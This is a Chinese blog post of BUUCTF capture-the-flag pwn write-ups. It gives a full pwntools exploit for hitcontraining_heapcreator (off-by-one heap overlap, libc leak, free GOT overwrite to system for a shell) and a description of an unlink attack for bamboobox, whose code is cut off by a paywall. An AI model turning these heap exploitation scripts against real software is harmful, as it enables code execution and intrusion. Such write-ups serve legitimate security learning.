BUUCTF-PWN刷题记录-3

最新推荐文章于 2024-05-11 09:52:27 发布
最新推荐文章于 2024-05-11 09:52:27 发布
阅读量847 收藏
点赞数
分类专栏: BUU-PWN 文章标签: malloc 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44145820/article/details/105197737
版权

目录

hitcontraining_heapcreator

在这里插入图片描述
考虑修改GOT表
在这里插入图片描述
在edit函数中可以溢出一个byte
这题需要利用堆重叠的方法,因为free之后会置空,只能利用堆重叠进行重复分配
利用思路如下:

  1. 先申请三个heap,其中heap[0]的内容大小为8的奇数倍
  2. 使用edit溢出修改heap[1]的chunk的size,把heap[2]的内容部分包括进去
  3. delete heap[1],然后申请同样大小的一个块
  4. 此时使用edit把heap[2]的content指针改为free的got表
  5. show heap[2],得到Libc基地址,计算system地址
  6. 把free GOT改为system的地址

Exp:

from pwn import *
from LibcSearcher import *

def add(size, content):
	print r.recvuntil("Your choice :")
	r.sendline('1')
	print r.recvuntil("Size of Heap : ")
	r.sendline(str(size))
	print r.recvuntil("Content of heap:")
	r.send(content)

def delete(index):
	print r.recvuntil("Your choice :")
	r.sendline('4')
	print r.recvuntil("Index :")
	r.sendline(str(index))

def edit(index, content):
	print r.recvuntil("Your choice :")
	r.sendline('2')
	print r.recvuntil("Index :")
	r.sendline(str(index))
	print r.recvuntil("Content of heap : ")
	r.send(content)

def show(index):
	print r.recvuntil("Your choice :")
	r.sendline('3')
	print r.recvuntil("Index :")
	r.sendline(str(index))
	

r = remote("node3.buuoj.cn", 26329)
#r = process("./hitcontraining_heapcreator")
#context.log_level = 'debug'
DEBUG = 0
if DEBUG:
	gdb.attach(r, 
	'''
	b *0x400D60
	c
	''')
context(arch = "amd64", os = 'linux')
elf = ELF("./hitcontraining_heapcreator")
free_got = elf.got['free']

add(0x18, 'a\n')
add(0x10, 'a\n')
add(0x10, 'a\n')

payload = '/bin/sh\x00' + 'a' * 0x10 + '\x81'
edit(0, payload)
delete(1)

payload = p64(0) * 8 + p64(8) + p64(free_got)
add(0x70, payload)

show(2)

print r.recvuntil("Content : ")
free_addr = u64(r.recvuntil('\x7f').ljust(8, '\x00'))
libc = LibcSearcher("free", free_addr)
libc_base = free_addr - libc.dump("free")
system = libc_base + libc.dump("system")
success("free:" + hex(free_addr))
success("system:" + hex(system))

edit(2, p64(system))
delete(0)
r.interactive()

hitcontraining_bamboobox

在这里插入图片描述
依然考虑修改GOT表
在这里插入图片描述
这题的漏洞在edit函数中,可以进行堆溢出,本题考虑使用unlink攻击
利用思路如下

  1. 申请四个item,其中item[3]的内容为/bin/sh
  2. 编辑item[1],溢出修改item[2]把item[1]的chunk状态变为空闲,并在item[1]中伪造chunk,大小为0x30,把fd变为itemlist-0x18,bk变为itemlist-0x10
  3. 释放item[2],此时item[1]就指向itemlist
  4. 把tem[0]改为free的got表,泄露,修改

Exp:

from pwn import *

def add(size, content):
	print r.recvuntil("Your choice:")
	r.sendline('2')
	print r.recvuntil("Please enter the length of item name:")
	r.sendline(str(size))
	print r.recvuntil("Please enter the name of item:")
	r.send(content)

def edit(index, size, content):
	print r.recvuntil("Your choice:")
	r
最低0.47元/天 解锁文章
L.o.W
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF PWN方向 1-6题 详解wp
qq_62564422的博客
02-06 1426
构造payload:变量声明后顺序入栈,每个标识表示变量所占栈空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序中的system函数需要栈对齐,在执行system时有一个指令需要栈对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
C语言栈溢出 重定向返回地址 执行shellcode学习
顺炸天
12-31 574
REF: https://www.youtube.com/watch?v=1S0aBV-Waeo- 栈结构 https://dl.packetstormsecurity.net/papers/attack/64bit-overflow.pdf- 64位linux 动手实现buffer overflow http://www.cppblog.com/baby-fly/archive/2010/07/27/121395.html- gdb debug 实验环境 Linux kali(201...
2024年最新CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1),学习路线+知识点梳理
最新发布
2401_84264244的博客
05-11 499
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4951
BUU CTF PWN 入门知识详解
BUUCTF--hitcontraining_heapcreator1
qq_30528603的博客
01-05 413
此时往chunk3这个用户堆写数据,将会写入free_got表里,这样我们可以将伪造的system的地址写入free_got表,一旦调用free,将会去执行system。2.接着修改chunk0的内容填入bin/sh作为后续system的参数,利用off-by-one并修改下一个索引chunk的大小为0x81(覆盖的是chunk1的索引堆)。这句其实可以这样解读read(0,对应索引堆里的那个堆地址,Size),现在他将变成这样read(0,&free_got,Size)。以此来达到我们的目的。
MoeCTF 2023 PWN
Xzzzz911的博客
10-14 631
MoeCTF 是西安电子科技大学一年一度的信息安全新生夺旗赛, 由西电信息安全协会 (XDSEC) 面向全体准大学生举办。完结撒花!!!
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
[PWN][补充篇]pwntools的相关知识
网络安全知识分享
03-28 1800
@TOC 0x0 安装 sudo pip install pwntools 0x1 导入包 from pwn import* 0x2 链接远程服务器或者链接本地文件 远程 r = remote(‘目的IP或目标URL’,目标端口号) 本地 r = process('./文件名') 0x3 接收远端回传的数据 interactive() //在取得shell之后使用,直接进行交互,相当于回到shell的模式 recv(numb = 字节大小,timeout = default) //接收指定字节数
BUUCTF题目Reverse & Pwn部分wp(持续更新)
苦行僧的妖孽日常
09-18 1164
BUUCTF题目Rverse & Pwn部分的writeup(持续更新)
writeup_itemboard
钞sir的博客
03-05 3670
看这个add功能的函数: void __cdecl new_item() { int cnt; // eax@1 char buf[1024]; // [sp+0h] [bp-410h]@1 int content_len; // [sp+404h] [bp-Ch]@1 Item *item; // [sp+408h] [bp-8h]@1 item = (Item *)mal...
Jarvis OJ - 栈系列部分pwn - Writeup
baikeng3674的博客
08-13 174
最近做了Jarvis OJ的一部分pwn题,收获颇丰,现在这里简单记录一下exp,分析过程和思路以后再补上 Tell Me Something 此题与level0类似,请参考level0的writeup http://www.cnblogs.com/WangAoBo/p/7591552.html 1 #!/usr/bin/env python ...
三个pwn
weixin_52640415的博客
06-28 1670
shortcut :格式化字符串漏洞写溢出 lucky_guy:alloca负值覆盖ret babynote:libc-2.31禁用exec写 ORW free_hook->sigreturnframe-> setcontex+61->orw
PWN学习-ADworld刷题
WocW的博客
06-04 1588
前言 搁置了一段时间没更博,经历了考试还有一些其他事,决心好好去学pwn。学习的方法打算是按照看视频课加刷题加查找资料来学习。 先把新手题都刷了一遍,都是很入门的题目,没啥好提的,收获也少。然后去刷进阶的题,但是目前还没有遇到堆的题目,视频课已经快学完了,学习资料是看的B站上的这个,觉得讲的很好,YOTUBE上也有 讲一下刷进阶题时个人遇到的一些坑…或者是学到的东西 分析 pwn-100 检查...
BUUCTF-pwn(4)
njh18790816639的博客
11-16 1255
pwn2_sctf_2016 该题目还是比较简单的! 并且存在int 80中断,但可惜没有/bin/sh字符串!所以还是ret2libc! from pwn import * from LibcSearcher import * context(log_level='debug',os='linux',arch='i386') r = remote('node4.buuoj.cn',28630) #r = process('./pwn2_sctf_2016') elf = ELF('./pwn2_sc
buuctf刷题记录18 [WUSTCTF2020]level3
ytj00的博客
08-01 783
经典无壳,拖进ida 最后输出的里面有衣穿加密字符串,一看就知道是base加密的,然后提上又提示是base64加密,拿去解密发现不对,感觉应该是吧base64的码表改了 然后找半天没找到那个函数, 然后找到这个奇怪的函数,果然是吧码表换了 写出脚本,得到改变的码表 然后根据之前的加密字符串,再写脚本 import base64 import string str1 = "d2G0ZjLwHjS7DmOzZAY0X2lzX3CoZV9zdNOydO9vZl9yZXZlcnGlfD==" strin
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值